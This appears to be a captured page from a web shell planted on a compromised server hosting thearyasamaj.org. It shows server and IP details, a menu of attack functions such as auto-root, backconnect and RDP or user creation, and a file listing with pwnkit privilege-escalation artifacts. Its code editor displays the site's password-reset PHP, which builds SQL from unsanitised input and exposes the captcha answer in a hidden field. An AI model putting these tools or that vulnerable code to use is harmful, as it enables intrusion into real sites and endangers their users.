Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.6
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
thearyasamaj /
public_html /
Archive /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
aryasamaj-download_arvind-09-0...
37.2
KB
-rw-r--r--
aryasamaj-download_arvind-10-0...
37.48
KB
-rw-r--r--
aryasamaj-download_arvind-16-0...
37.92
KB
-rw-r--r--
aryasamaj-downloadall_arvind-1...
33.12
KB
-rw-r--r--
aryasamaj-forgotpwd_arvind-06-...
5.91
KB
-rw-r--r--
aryasamaj-forgotpwd_arvind-17-...
5.93
KB
-rw-r--r--
aryasamaj-login_11-01-16.php
20.64
KB
-rw-r--r--
aryasamaj-login_13-01-16.php
20.47
KB
-rw-r--r--
aryasamaj-login_29-01-16.php
20.67
KB
-rw-r--r--
aryasamaj-menu_09-03-16.php
8.21
KB
-rw-r--r--
aryasamaj-menu_28-06-18.php
8.3
KB
-rw-r--r--
aryasamaj-menu_arvind-03-07-18...
8.3
KB
-rw-r--r--
aryasamaj-recapcha_arvind-10-0...
2.03
KB
-rw-r--r--
aryasamaj-recapcha_arvind-16-0...
2
KB
-rw-r--r--
aryasamaj-totaldownload_29-06-...
2.8
KB
-rw-r--r--
aryasamaj-totaldownload_arvind...
2.84
KB
-rw-r--r--
aryasamaj-totaldownload_arvind...
2.92
KB
-rw-r--r--
aryasamaj-totaldownload_arvind...
3.06
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : aryasamaj-forgotpwd_arvind-06-07-18.php
<?php session_start(); include('include/aryasamaj-clientinclude.php'); $Get_id = $_GET["id"]; if(isset($_POST['btnForgetPwd']) && $_POST['btnForgetPwd'] != "") { if (empty($_POST['image_text']) || $_POST['image_text'] == "EnterRecaptch") { echo "<font color=\"Red\">You Forgot To Enter Your Recaptcha.</font>"; } else if($_POST['image_text']!=$_POST['rechapchatext']) { echo "<font color=\"Red\">Please Enter a Valid Recaptcha.</font>"; } else { $Get_Email = (isset($_POST['txtUserName'])?$_POST['txtUserName']:""); if($Get_id == 0) // this is use for member login { $loginidquery="select login_id,login_name,login_randno from arya_userlogin where (login_name='".$Get_Email."') AND insttype_id = 0"; } else // this is use for institution login { $loginidquery="select login_id,login_name,login_randno from arya_userlogin where (login_name='".$Get_Email."') AND insttype_id > 0"; } $res = mysql_query($loginidquery); $numrows=mysql_num_rows($res); $fetchrw = mysql_fetch_array($res); $loginid = $fetchrw["login_id"]; //use login id use for get member name $fetchemail=$fetchrw["login_name"]; $memfirstnm = getFieldValue('meb_firstname','arya_member','login_id="'.$loginid.'"'); //Member first name $instnm=getFieldValue('inst_name','arya_institution','login_id="'.$loginid.'"'); //Member first name $todaydate=strtotime(date('Y-m-d H:i:s')); $rndno=$fetchrw["login_randno"]; if($rndno == "") { $rndno=rand(); $update_query="UPDATE arya_userlogin SET login_randno = '".$rndno."' WHERE login_id = ".$loginid.""; $update_query = mysql_query($update_query); } if($Get_Email==$fetchemail) { if($numrows > 0) { $conflink="http://".$_SERVER['SERVER_NAME']."/creatpass?date=".$todaydate."&randid=".$rndno.""; if($Get_id== 0) { $val=$memfirstnm; } else { $val=$instnm; } $To=$Get_Email; $From="adminservices@thearyasamaj.org"; $subject = "Forgot Password"; $headers = 'MIME-Version: 1.0' . "\r\n"; $headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n"; $headers .= "To: '".$To."'" . "\r\n"; $headers .= "From: ".$From."" . "\r\n"; $message = "Dear ".$val."," . "<br /><br /><br /><br />"; $message .= "Namaste !" . "<br /><br /><br/><br />"; $message .= "We have received a request for generation of new password for your Admin " . "<br />"; $message .= "Account."."<br /><br /><br />"; $message .= "If you have requested for this, please click following Link to generate new " . "<br />"; $message .= "Password."."<br /><br />"; $message .= "The link will expire in seven days." . "<br /><br />"; $message .= "Click On This Link"."<br /><br />"; $message .= "<a href=".$conflink." title=''>Click here to confirm</a>"."<br /><br />"; $message .= "AND Create Your Password." . "<br /><br /><br />"; $message .= "If you have not requested for the same, please ignore this email and continue "."<br />"; $message .= "with old passward." . "<br /><br /><br /><br />"; //$message .= 'UserName : '. $numArr["admuser_email"]."<br />"; //$message .= ''.$lbl_pass.' : '. base64_decode($numArr["user_password"])."<br /><br />"; $message .= "With Regards," . "<br /><br />"; $message .= "Super Admin" . "<br />"; $message .= "thearyasamaj.org Team"; if(mail($To, $subject, $message, $headers)) //===for live { echo "<font color=\"Green\">Password Reset Email Sent Successfully Please check you Email Inbox.</font>"; } }//numrows else { echo "Your Succussfully Send Mail.Please Check Your Mail Id."; } }//Get_email==fetchemail else { echo "<font color=\"Red\">Your Email Id is not valid Please enter valid Email Id.</font>"; } } } //This is used for recaptch code start Added By Navneet $imgRandValue=random_string(5); $VarificationImg='<img src="verification-code.php?txt='.$imgRandValue.'" border="1" alt="" />'; //This is used for recaptch code start Added By Navneet ?> <!DOCTYPE html > <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="stylesheet" href="css/style.css" type="text/css" /> <script language="javascript" src="js/common.js"></script> </head> <body style="background:#fff;"> <div style="height: 175px; "> <form class="login_wrapper" id="contact" action="" method="post" id="frmforgotpwd" name="frmforgotpwd"><!-- login_wrapper start --> <h1><?php echo $title_forgotpwd; ?></h1> <?php if($msg1 != "") { ?> <div class="paddbot10"><?php echo SuccessMessage($msg1);?></div> <?php } else { ?> <div class="paddbot10"><?php echo SuccessMessage($msg);?></div> <?php } ?> <input type="text" value="<?php echo $vlemadd; ?>" name="txtUserName" id="txtUserName" class="text_box" onFocus="clearText(this)" onblur="addText(this)"/><br /> <!--<input type="text" value="<?php //echo $vlmbno; ?>" name="txtMobileno" id="txtMobileno" class="text_box" onFocus="clearText(this)" onblur="addText(this)"/><br /> <input type="text" value="<?php //echo $fname; ?>" name="txtFName" id="txtFName" class="text_box" onFocus="clearText(this)" onblur="addText(this)"/><br />--> <div class="paddbot10"><div id="emptydiv"> <?php echo $VarificationImg; ?> <input name="image_text" id="image_text" type="text" class="text_box1" style="vertical-align:top; width:100px; margin:8px 0 0 0;" value="EnterRecaptch" onFocus="clearText(this)" onblur="addText(this)"/> <input type="hidden" name="rechapchatext" id="rechapchatext" value="<?php echo $imgRandValue;?>"/><input type="button" class="skipThese" name="captcha" id="captcha" value="Reload" onclick="findrecaptcha();" style="float:right; margin-top:8px;"/></div> </div> <input type="submit" value="<?php echo $btn_submit;?>" name="btnForgetPwd" id="btnForgetPwd" class="submit_login" /> </form><!-- login_wrapper end --> </div> </body> </html>
Close